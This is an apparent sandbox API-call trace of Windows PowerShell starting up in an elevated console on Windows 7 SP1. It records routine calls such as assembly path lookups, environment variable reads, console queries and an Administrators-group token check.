	[0730.854] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.854] CoTaskMemFree (pv=0x2d4c00) 
	[0730.858] CoTaskMemAlloc (cb=0x104) returned 0x2d4c00
	[0730.858] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0730.858] CoTaskMemFree (pv=0x2d4c00) 
	[0732.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0732.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0744.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0744.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0746.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0746.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0750.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0750.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0758.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0758.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0760.409] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0760.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0760.409] CoTaskMemFree (pv=0x2d4e20) 
	[0760.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cdac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0760.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cda10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0760.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cda10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0760.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cda10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0762.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1cd9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0762.766] SetErrorMode (uMode=0x1) returned 0x1
	[0762.767] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1cdc60 | out: lpFileInformation=0x1cdc60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0762.767] SetErrorMode (uMode=0x1) returned 0x1
	[0785.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cdac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0785.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cda10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0786.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cda10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0786.637] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0786.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.637] CoTaskMemFree (pv=0x2d4e20) 
	[0786.640] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0786.640] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.640] CoTaskMemFree (pv=0x2d4e20) 
	[0786.641] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0786.641] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.641] CoTaskMemFree (pv=0x2d4e20) 
	[0786.644] CoCreateGuid (in: pguid=0x1ce028 | out: pguid=0x1ce028*(Data1=0x1ce7dbde, Data2=0xc4c0, Data3=0x4fdb, Data4=([0]=0xbd, [1]=0xc8, [2]=0x5f, [3]=0x7d, [4]=0x52, [5]=0x2f, [6]=0xcc, [7]=0x3f))) returned 0x0
	[0786.647] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0786.647] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.647] CoTaskMemFree (pv=0x2d4e20) 
	[0786.653] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0786.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.654] CoTaskMemFree (pv=0x2d4e20) 
	[0786.656] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0786.656] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0786.656] CoTaskMemFree (pv=0x2d4e20) 
	[0786.675] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0787.719] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1cdcd0 | out: lpConsoleScreenBufferInfo=0x1cdcd0) returned 1
	[0787.753] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0788.791] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1cdcd0 | out: lpConsoleScreenBufferInfo=0x1cdcd0) returned 1
	[0788.793] GetVersionExW (in: lpVersionInformation=0x1cdc60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cdc60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0788.795] GetCurrentProcess () returned 0xffffffffffffffff
	[0788.796] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1cdcf8 | out: TokenHandle=0x1cdcf8*=0x308) returned 1
	[0788.800] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cdc18 | out: TokenInformation=0x0, ReturnLength=0x1cdc18) returned 0
	[0788.801] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x227250
	[0788.801] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x227250, TokenInformationLength=0x4, ReturnLength=0x1cdc18 | out: TokenInformation=0x227250, ReturnLength=0x1cdc18) returned 1
	[0788.803] DuplicateTokenEx (in: hExistingToken=0x308, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1cdd78 | out: phNewToken=0x1cdd78*=0x304) returned 1
	[0788.803] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cdc18 | out: TokenInformation=0x0, ReturnLength=0x1cdc18) returned 0
	[0788.803] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x227300
	[0788.803] GetTokenInformation (in: TokenHandle=0x308, TokenInformationClass=0x8, TokenInformation=0x227300, TokenInformationLength=0x4, ReturnLength=0x1cdc18 | out: TokenInformation=0x227300, ReturnLength=0x1cdc18) returned 1
	[0788.804] CheckTokenMembership (in: TokenHandle=0x304, SidToCheck=0x2d18038*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1cdd88 | out: IsMember=0x1cdd88) returned 1
	[0788.804] CloseHandle (hObject=0x304) returned 1
	[0788.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0788.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0788.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0788.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0789.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0789.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0789.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0789.761] CoTaskMemAlloc (cb=0x804) returned 0x1b8e4a10
	[0789.761] GetConsoleTitleW (in: lpConsoleTitle=0x1b8e4a10, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0789.762] CoTaskMemFree (pv=0x1b8e4a10) 
	[0789.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0789.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0789.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0789.781] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0791.650] SetConsoleCtrlHandler (HandlerRoutine=0x2a7688c, Add=1) returned 1
	[0791.662] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0791.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0791.662] CoTaskMemFree (pv=0x2d4e20) 
	[0792.590] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c
	[0792.591] CoCreateGuid (in: pguid=0x1cde70 | out: pguid=0x1cde70*(Data1=0x5c44bf47, Data2=0x8be4, Data3=0x4982, Data4=([0]=0x9b, [1]=0x3a, [2]=0xa0, [3]=0xb2, [4]=0x22, [5]=0x0, [6]=0xa, [7]=0x37))) returned 0x0
	[0792.592] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0792.592] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.592] CoTaskMemFree (pv=0x2d4e20) 
	[0792.596] WinSqmIsOptedIn () returned 0x0
	[0792.596] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0792.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.596] CoTaskMemFree (pv=0x2d4e20) 
	[0792.597] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0792.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.597] CoTaskMemFree (pv=0x2d4e20) 
	[0792.598] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0792.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.598] CoTaskMemFree (pv=0x2d4e20) 
	[0792.598] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0792.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.598] CoTaskMemFree (pv=0x2d4e20) 
	[0792.599] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0792.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.599] CoTaskMemFree (pv=0x2d4e20) 
	[0792.600] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0792.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.600] CoTaskMemFree (pv=0x2d4e20) 
	[0792.601] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0792.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.601] CoTaskMemFree (pv=0x2d4e20) 
	[0792.601] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0792.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.601] CoTaskMemFree (pv=0x2d4e20) 
	[0792.611] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0792.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.611] CoTaskMemFree (pv=0x2d4e20) 
	[0792.621] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0792.621] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.621] CoTaskMemFree (pv=0x2d4e20) 
	[0792.622] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0792.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.622] CoTaskMemFree (pv=0x2d4e20) 
	[0792.622] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0792.622] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0792.622] CoTaskMemFree (pv=0x2d4e20) 
	[0797.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0797.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0797.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0797.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0799.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
